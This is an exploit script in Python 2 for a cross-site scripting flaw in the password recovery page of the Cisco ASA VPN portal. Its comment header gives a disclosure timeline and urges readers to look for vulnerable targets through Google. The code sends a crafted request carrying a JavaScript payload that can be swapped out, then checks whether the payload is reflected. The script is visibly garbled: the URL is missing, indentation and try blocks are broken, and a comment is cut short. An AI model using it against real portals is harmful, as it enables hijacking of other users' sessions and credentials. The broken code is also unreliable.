# Exploit author: Juan Sacco - jsa...@exploitpack.com
# Affected program: Cisco ASA VPN Portal - Zero Day
# Cisco ASA VPN is prone to a XSS on the password recovery page.
# This vulnerability can be used by an attacker to capture other user's
# The password recovery form fails to filter properly the hidden inputs
# This Zero Day exploit has been developed and discovered by Juan Sacco.
# Exploit Pack - Team http://exploitpack.com
# Release Dates:
# Reported to Cisco PSIRT Feb 4/2016
# Cisco Dev Team working on a fix Feb 15/2016
# Cisco PSIRT report a CVE Feb 15/2016
# Exploit Pack disclose the bug Feb 15/2016
# Disclosure of the Exploit Feb 16/2016
# Look for vulnerable targets here:
# More than 18.000 results in Google only

import string, sys
import socket, httplib
import telnetlib

def run():
    Target = sys.argv[1]
Port = int(sys.argv[2])
# Here goes your custom JS agent code
Payload = "alert(1)"
VulnerableURL =
+ Payload + "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_"
CraftedRequest = VulnerableURL
  # Start the connection
connection = httplib.HTTPSConnection(Target)
connection.request('GET', CraftedRequest)
Response = connection.getresponse()
print "Server status response:", Response.status, Response.reason
data =  Response.read()
vulnerable = "Target is not vulnerable"
for line in str(data).splitlines():
if "juansacco\\\"" in line:
vulnerable = "Targer is vulnerable"
if vulnerable != "Not vulnerable":
print "Result of the test:", vulnerable
# Find the injection on the response
   except Exception,e:
     print "Exploit connection closed " + str(e)

if __name__ == '__main__':
   print "Cisco VPN ASA Exploit - Zero Day"
   print "################################"
   print "Author: Juan Sacco - jsa...@exploitpack.com"

     Target = sys.argv[1]
     Port = sys.argv[2]
   except IndexError:

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